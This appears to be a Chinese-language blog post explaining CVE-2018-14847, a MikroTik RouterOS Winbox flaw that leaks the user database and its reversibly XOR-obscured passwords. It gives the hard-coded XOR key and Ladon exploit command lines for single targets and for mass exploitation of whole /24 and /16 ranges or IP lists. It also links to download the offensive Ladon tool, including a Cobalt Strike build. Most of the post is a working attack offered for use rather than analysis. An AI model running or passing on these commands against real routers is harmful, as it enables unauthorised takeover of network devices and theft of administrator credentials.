logo

K8哥哥

没有绝对安全的系统

〖EXP〗CVE-2018-14847 RouterOS Exploit

本文于 1307 天之前发表

漏洞介绍

相关的技术讨论作者在 21 May 2018 日就以文章的形式详细阐述 https://n0p.me/winbox-bug-dissection/ ,漏洞大致是这样的:

Winbox申请登录以后会从RouterOS里面下载一些适用于当前版本的ROS的DLL文件作为Winbox的功能模块来执行,但是这个下载行为没有恰当的鉴权,通过精心构造的请求包,可以下载任意文件,包括RouterOS的用户数据库文件。
RouterOS的用户数据库存储的密码没有使用标准的加密方式加密,只是把密码原文和 md5(用户名 + “283i4jfkai3389”) 做了一次XOR运算,运算结果完全可逆,几乎可以认为是明文存储了密码,使用LadonGo的CVE-2018-14847 EXP可以直接还原出明文密码,导致路由器沦陷。
影响范围 6.29 (release date: 2015/28/05) to 6.42 (release date 2018/04/20)

RouterOS下载

https://download2.mikrotik.com/routeros/6.38.4/mikrotik-6.38.4.iso

image

单IP利用

1
2
3
Ladon 192.168.1.50 CVE-2018-14847
Ladon CVE-2018-14847 192.168.1.50
Ladon CVE-2018-14847 192.168.1.50 8291

image

批量利用

1
2
3
4
Ladon 192.168.1.50/24 CVE-2018-14847 C段
Ladon 192.168.1.50/c CVE-2018-14847 C段
Ladon 192.168.1.50/b CVE-2018-14847 B段
Ladon ip.txt CVE-2018-14847 IP.TXT

image

Download

LadonGo (ALL OS)

https://github.com/k8gege/LadonGo/releases

Ladon (Windows & Cobalt Strike)

历史版本: https://github.com/k8gege/Ladon/releases
7.0版本:http://k8gege.org/Download
8.0版本:K8小密圈

扫码加入K8小密圈